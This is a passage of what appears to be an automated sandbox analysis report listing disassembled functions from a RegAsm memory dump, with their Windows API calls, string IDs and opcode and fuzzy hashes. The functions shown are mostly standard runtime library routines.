                                                                      • Opcode Fuzzy Hash: a5c252052bcb0491f776e6ef14947f4a9bd6010c39f943c73514e5bfa4adce70
                                                                      • Instruction Fuzzy Hash: 4CC1D172B043025BD714AA2A8A4463BB1D69FD4344F19453FEE49E73D2FBB9DC01829A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00451695 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00407D71,?,57C18905,?,004517A2,?,0040103B,00407D71,00000000), ref: 00451756
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3664257935-537541572
                                                                      • Opcode ID: e9ec4486dfe6b641a0acd61e98ca132064a6b954e291df8d8f92c24f6c955edb
                                                                      • Instruction ID: 0523bce91d842dbc5e3eb6b6fa0f6dfec1f0a1466e479ab085b3e4057282b445
                                                                      • Opcode Fuzzy Hash: e9ec4486dfe6b641a0acd61e98ca132064a6b954e291df8d8f92c24f6c955edb
                                                                      • Instruction Fuzzy Hash: FE212BB1E01210E7DB219728DC81F5B3758DB49775F240122ED16A73E2E778ED09C6D9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00448598 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,57C18905,00000000,?,00000000,0046258B,000000FF,?,00448662,?,?,0044871D,?), ref: 004485CD
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004485DF
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,0046258B,000000FF,?,00448662,?,?,0044871D,?), ref: 00448601
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll$uC
                                                                      • API String ID: 4061214504-2081361828
                                                                      • Opcode ID: 8d67b138515a18014216ec7bc1bbc2fd52bf164cd13d5711a8e277eb5853b77d
                                                                      • Instruction ID: c112873b41e5f5ec4646b21c0a0d35608f4b09fd0d60c4f162e1b5e9e3885544
                                                                      • Opcode Fuzzy Hash: 8d67b138515a18014216ec7bc1bbc2fd52bf164cd13d5711a8e277eb5853b77d
                                                                      • Instruction Fuzzy Hash: 67016771E54615BBDB119F54DC05BAEBBB8FB04711F00053AF811A26D0EBB99904CA99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045711E Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a06e3559091d92e6dc7ade3254ffdc2c7234af30cb13c05837ab8f37671d2dff
                                                                      • Instruction ID: e00fe882aa76f24cade1a4ebe65b9025e303db7115826925bada92ab41ad270d
                                                                      • Opcode Fuzzy Hash: a06e3559091d92e6dc7ade3254ffdc2c7234af30cb13c05837ab8f37671d2dff
                                                                      • Instruction Fuzzy Hash: 66B11970A082459FDF11CF99E880B6E7BB1BF46315F14416AEC049B353C7789E4ACB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041F1EE Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: 88e3123deae05901766ef15ed3eb2476f200bbcaf318e9aed2733b4d3303859c
                                                                      • Instruction ID: a3fa85deb776d174940e9522bce43f8749fd13cd89d9eaf17ed8b465a6b13a81
                                                                      • Opcode Fuzzy Hash: 88e3123deae05901766ef15ed3eb2476f200bbcaf318e9aed2733b4d3303859c
                                                                      • Instruction Fuzzy Hash: 0941C9BA9001117FE7119F14EC82E6B3764EF5A318F0540A9FD48A7303E735A91587EB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00450F54 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00450F4B,0043EF66,0043EAB7), ref: 00450F62
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00450F70
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00450F89
                                                                      • SetLastError.KERNEL32(00000000,00450F4B,0043EF66,0043EAB7), ref: 00450FDB
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: 5f7e7e767363da93a9661f2d923ba1ac03775c4646d4c45f04712cebf2032a4e
                                                                      • Instruction ID: 88b79da8d0ada330983d1ffca9328a7393bee42d094f36178f0440da4ee2e7e2
                                                                      • Opcode Fuzzy Hash: 5f7e7e767363da93a9661f2d923ba1ac03775c4646d4c45f04712cebf2032a4e
                                                                      • Instruction Fuzzy Hash: 97019E3761A2126EA6252F657D8652B2A48EB1677B720023FFC10541E3FFD9480DA18D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045E706 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID: uC
                                                                      • API String ID: 1740715915-162574398
                                                                      • Opcode ID: e11fdfa2da8ddc6fb0d173095ab86c735b090b61c9adf9c542e10d774002f470
                                                                      • Instruction ID: 37f53a8ed0d4057df5830adcda63a78e3eb800127ffe1eb2d1f470213f96f25e
                                                                      • Opcode Fuzzy Hash: e11fdfa2da8ddc6fb0d173095ab86c735b090b61c9adf9c542e10d774002f470
                                                                      • Instruction Fuzzy Hash: 4851D472501302AFEB2DAF53C841B7A77A4EF08716F14452FEC1147292E739AE49C799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0044B597 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcsrchr
                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                      • API String ID: 1752292252-4019086052
                                                                      • Opcode ID: 885f5da804d4d5cce9bcf66fb648dd8b380d8d06ddad2d56da10b9640fc1f23b
                                                                      • Instruction ID: f3b60009b5685a148431e6f86b8bbc4172e9ad068afdf9e34a828c3c1066877d
                                                                      • Opcode Fuzzy Hash: 885f5da804d4d5cce9bcf66fb648dd8b380d8d06ddad2d56da10b9640fc1f23b
                                                                      • Instruction Fuzzy Hash: 3701E5A7604635313618201E5C02A3B9798DB95BB8B27802FF841E72C2FF5DDD4251DE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0044AEBF Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f54f9081ace57b480f6bc85ed4343d8be96a7925da3cb3942432b0cd9b77cc1
                                                                      • Instruction ID: a91585b51351be147a41a28daba908378a935e9d8126f06853a6853397c791a4
                                                                      • Opcode Fuzzy Hash: 5f54f9081ace57b480f6bc85ed4343d8be96a7925da3cb3942432b0cd9b77cc1
                                                                      • Instruction Fuzzy Hash: 48513E75D01209AAEB00EFE5D840ADFB7B8EF08714F14411BE815E7251EB34EA45CB6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0044B97E Relevance: 7.6, APIs: 5, Instructions: 143pipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileType.KERNEL32(?,00000006,00000000,?), ref: 0044B9A0
                                                                      • GetFileInformationByHandle.KERNEL32(?,?), ref: 0044B9FA
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0044B8A3,00000006), ref: 0044BA88
                                                                      • __dosmaperr.LIBCMT ref: 0044BA8F
                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0044BACC
                                                                        • Part of subcall function 0044B645: __dosmaperr.LIBCMT ref: 0044B67A
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                      • String ID:
                                                                      • API String ID: 1206951868-0
                                                                      • Opcode ID: 537b6c459f0231a2d5d0f318e0bc1aaf18acdd4804f3e120b5e30f55cc7a442d
                                                                      • Instruction ID: b2a4d8dcc5766e886369e3870e4448a7fe7f026c1d9bf7624856e4988d9716fd
                                                                      • Opcode Fuzzy Hash: 537b6c459f0231a2d5d0f318e0bc1aaf18acdd4804f3e120b5e30f55cc7a442d
                                                                      • Instruction Fuzzy Hash: 72414E75900604AFEB24DFB6DC459ABBBF9EF88304B10492EF456E3610EB34D845CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041BCDD Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID: $\
                                                                      • API String ID: 4218353326-1413047179
                                                                      • Opcode ID: 0d5be502e3e2d937a3d51b9509afae246f52c6854b298b405245c7d501694b48
                                                                      • Instruction ID: c3a18b9ac9a5f72da57081e75e862650c4163fe137eacb9b5cf45a3a05dc818e
                                                                      • Opcode Fuzzy Hash: 0d5be502e3e2d937a3d51b9509afae246f52c6854b298b405245c7d501694b48
                                                                      • Instruction Fuzzy Hash: 9341FC71A043006BE7206A659C41BEF7798DF84354F04453FFA9983292E739DD8587DB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0043F110 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0043F14F
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0043F203
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm$uC
                                                                      • API String ID: 3480331319-2677303287
                                                                      • Opcode ID: b35b9aae8db331a27ca3160b77340e98725b3603cc6122c4e4e54fd182356900
                                                                      • Instruction ID: 5ff47f66bf8fec1507aa9188646af90ae576d399401620c5dc8a30c9c83cc870
                                                                      • Opcode Fuzzy Hash: b35b9aae8db331a27ca3160b77340e98725b3603cc6122c4e4e54fd182356900
                                                                      • Instruction Fuzzy Hash: 6141B634E00208EBCF10DF69D840A9EBBB5BF49314F1481ABEC145B3A2D7799E09CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045EE04 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0045ED0A,?,?,00000000,00000000,00000000,?), ref: 0045EE29
                                                                      • CatchIt.LIBVCRUNTIME ref: 0045EF0F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CatchEncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 1435073870-2084237596
                                                                      • Opcode ID: e0935fe45de021845a0cfffd8d00856ddc7a5c30a69e2b60d6d790f1645431a7
                                                                      • Instruction ID: a1b70d3438e286458a62a2d8a4a9a1f1b9492281a04f310ff6274f0c117cb870
                                                                      • Opcode Fuzzy Hash: e0935fe45de021845a0cfffd8d00856ddc7a5c30a69e2b60d6d790f1645431a7
                                                                      • Instruction Fuzzy Hash: B9418A32900209EFCF19DF95CD81AAEBBB5FF48305F14809AFD0467262D7399A54CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045E66F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0045E8E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ___except_validate_context_record
                                                                      • String ID: csm$csm$uC
                                                                      • API String ID: 3493665558-1698735748
                                                                      • Opcode ID: 858b53cedb40eeb6dfe66868dda80e8b33fb489c5c4a9cf3e20f1607c3ee639b
                                                                      • Instruction ID: 326af9b4947efd1ef17aafe77bc34d2e03300457ba53eb534140d3c8b73d0699
                                                                      • Opcode Fuzzy Hash: 858b53cedb40eeb6dfe66868dda80e8b33fb489c5c4a9cf3e20f1607c3ee639b
                                                                      • Instruction Fuzzy Hash: 183108B6400215EBCF6A4F43C94096B7B66FF05316B18416BFD4409213D37ADE69DBCA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045BD71 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00450F02,00000000,00000800,?,0045BE0D,00000000,00000000,00000000,?,?,?,0045BC55,00000000,FlsAlloc,00468FA0,00468FA8), ref: 0045BD7E
                                                                      • GetLastError.KERNEL32(?,0045BE0D,00000000,00000000,00000000,?,?,?,0045BC55,00000000,FlsAlloc,00468FA0,00468FA8,00000000,?,00450F02), ref: 0045BD88
                                                                      • LoadLibraryExW.KERNEL32(00450F02,00000000,00000000,?,00450F02,00450FE6,00000003,00451A06), ref: 0045BDB0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3177248105-2084034818
                                                                      • Opcode ID: fd39af0d5a4259bc70771728417216c13b1fc30c122621be542556ec514d497c
                                                                      • Instruction ID: 8b69170700efb3c23616c2f0b6c72b97cf1ceda8ab7a3830421cf19611126c62
                                                                      • Opcode Fuzzy Hash: fd39af0d5a4259bc70771728417216c13b1fc30c122621be542556ec514d497c
                                                                      • Instruction Fuzzy Hash: 24E01270B80204B6EB501B61DC06B693B65AB10B56F140031FD0DA41E1E7AB995C9A8D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00454ECA Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNEL32(57C18905,00459CA3,00000000,?), ref: 00454F2D
                                                                        • Part of subcall function 00457983: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045C6DE,?,00000000,-00000008), ref: 00457A2F
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00455188
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004551D0
                                                                      • GetLastError.KERNEL32 ref: 00455273
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                      • String ID:
                                                                      • API String ID: 2112829910-0
                                                                      • Opcode ID: e82b5a327e512ed909e900aa97458940dbec9042fbeb66105a98d7751f3b8af8
                                                                      • Instruction ID: 2a2c9c9e2a3e43d72e85924a80d1cacc0d4917b3cd212d80ead8fae90dc08c45
                                                                      • Opcode Fuzzy Hash: e82b5a327e512ed909e900aa97458940dbec9042fbeb66105a98d7751f3b8af8
                                                                      • Instruction Fuzzy Hash: C7D178B5E006489FCF05CFE8D890AADBBB4FF49304F18416AE855EB352E634A946CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00457F50 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0504f276084caae6bec87dca7646dc5ed37b7cc546c8610682ef9826aa6f21a
                                                                      • Instruction ID: a997861867eb3e37c4d4ec2a62efd4cd9a1002cdf2f4c884355181378c2468c6
                                                                      • Opcode Fuzzy Hash: c0504f276084caae6bec87dca7646dc5ed37b7cc546c8610682ef9826aa6f21a
                                                                      • Instruction Fuzzy Hash: A441FC72A00704AFD7249F39CC01B6BBBE9EB88715F10852FF411EB682DA7999458784
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004556C1 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,0044CF14,00000001,?,0044CF14,004011D8,?,00000000), ref: 004556D7
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,004011D8,00000000), ref: 004556E4
                                                                      • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,004011D8,00000000), ref: 0045570A
                                                                      • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00455730
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FilePointer$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 142388799-0
                                                                      • Opcode ID: c89c4d8a9f10775c062e65d271bbdedf8aa6dbb4baace424ca65829dd7353818
                                                                      • Instruction ID: 8f02704613c881f7ed44a99493cabae2e30425aea0d79714b4c0edb90373d3e1
                                                                      • Opcode Fuzzy Hash: c89c4d8a9f10775c062e65d271bbdedf8aa6dbb4baace424ca65829dd7353818
                                                                      • Instruction Fuzzy Hash: AB119772901118FFCF209F55CC088AF3F79EF08365F00414AF8289A2A1EB758A54DBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045A526 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(00000006,?,?,00000000,0045A41F,00000000,?,0046045C,0045A41F,?,00000006,00000000,00000104,?,00000001,00000000), ref: 0045A53C
                                                                      • GetLastError.KERNEL32(?,0046045C,0045A41F,?,00000006,00000000,00000104,?,00000001,00000000,00000000,?,0045A41F,?,00000104,?), ref: 0045A546
                                                                      • __dosmaperr.LIBCMT ref: 0045A54D
                                                                      • GetFullPathNameW.KERNEL32(00000006,?,?,00000000,?,?,0046045C,0045A41F,?,00000006,00000000,00000104,?,00000001,00000000,00000000), ref: 0045A577
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 1391015842-0
                                                                      • Opcode ID: 05ff986f7f00613bcb2274bc04e7952f7913e6e1cde3abafb6be8021263328f3
                                                                      • Instruction ID: 8f23431076fed018fab1dcfc43c65ba91ea32adb6374605e65fd7435fda7905e
                                                                      • Opcode Fuzzy Hash: 05ff986f7f00613bcb2274bc04e7952f7913e6e1cde3abafb6be8021263328f3
                                                                      • Instruction Fuzzy Hash: FCF0F472600205BFDB205FA2DC04E17BBA9FF04361710892AF915C2521EB75E8289B1A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045A58C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(00000006,?,?,00000000,0045A41F,00000000,?,004603E4,0045A41F,0045A41F,?,00000006,00000000,00000104,?,00000001), ref: 0045A5A2
                                                                      • GetLastError.KERNEL32(?,004603E4,0045A41F,0045A41F,?,00000006,00000000,00000104,?,00000001,00000000,00000000,?,0045A41F,?,00000104), ref: 0045A5AC
                                                                      • __dosmaperr.LIBCMT ref: 0045A5B3
                                                                      • GetFullPathNameW.KERNEL32(00000006,?,?,00000000,?,?,004603E4,0045A41F,0045A41F,?,00000006,00000000,00000104,?,00000001,00000000), ref: 0045A5DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 1391015842-0
                                                                      • Opcode ID: 8eb375d63ec98620152693bf0500119df2bc878750a24184c61ae81cba765983
                                                                      • Instruction ID: 9fb711a7d2f2d6464d00d1d399f9f1202196810c424377f87987202de6bac74c
                                                                      • Opcode Fuzzy Hash: 8eb375d63ec98620152693bf0500119df2bc878750a24184c61ae81cba765983
                                                                      • Instruction Fuzzy Hash: BDF0A472700204BFDB206FA3DC04D57BBA9EF44361714852EF956C2121EB75EC24DB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004611F8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(00000000,00459CA3,00000000,00000000,00000000,?,0045EFAA,00000000,00000001,00000000,?,?,004552C7,?,00459CA3,00000000), ref: 0046120F
                                                                      • GetLastError.KERNEL32(?,0045EFAA,00000000,00000001,00000000,?,?,004552C7,?,00459CA3,00000000,?,?,?,00454C12,0044897D), ref: 0046121B
                                                                        • Part of subcall function 0046126C: CloseHandle.KERNEL32(FFFFFFFE,0046122B,?,0045EFAA,00000000,00000001,00000000,?,?,004552C7,?,00459CA3,00000000,?,?), ref: 0046127C
                                                                      • ___initconout.LIBCMT ref: 0046122B
                                                                        • Part of subcall function 0046124D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004611E9,0045EF97,?,?,004552C7,?,00459CA3,00000000,?), ref: 00461260
                                                                      • WriteConsoleW.KERNEL32(00000000,00459CA3,00000000,00000000,?,0045EFAA,00000000,00000001,00000000,?,?,004552C7,?,00459CA3,00000000,?), ref: 00461240
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: c50a5f839614c46be5582a073cd018407abba97ea9c1a79c8211c1ad318fe419
                                                                      • Instruction ID: ee24b97f7bc65a100fd4a35f52b536f50fd9c8021c03b451ecb78b329b447cfa
                                                                      • Opcode Fuzzy Hash: c50a5f839614c46be5582a073cd018407abba97ea9c1a79c8211c1ad318fe419
                                                                      • Instruction Fuzzy Hash: A9F03736901214BBCF121FD5DC0599A3F65FF49360F044061FE18E5130E732C8209BDA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004314F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObject
                                                                      • String ID: p9lY$p9lY
                                                                      • API String ID: 1531683806-1149557311
                                                                      • Opcode ID: de1d61dd1560775419792220a3a1f33499a7f7a80c32991eb49227003bada6fd
                                                                      • Instruction ID: cf39e9a7ed97d636a1f5e38e9f91983c3ae18497fdc5a72e96b4981a9c6bbeaa
                                                                      • Opcode Fuzzy Hash: de1d61dd1560775419792220a3a1f33499a7f7a80c32991eb49227003bada6fd
                                                                      • Instruction Fuzzy Hash: FBF0C2B190C714AB8F201F29AC8446A7EA0DAD9714F10196BF44AC3331D6388C469B6B
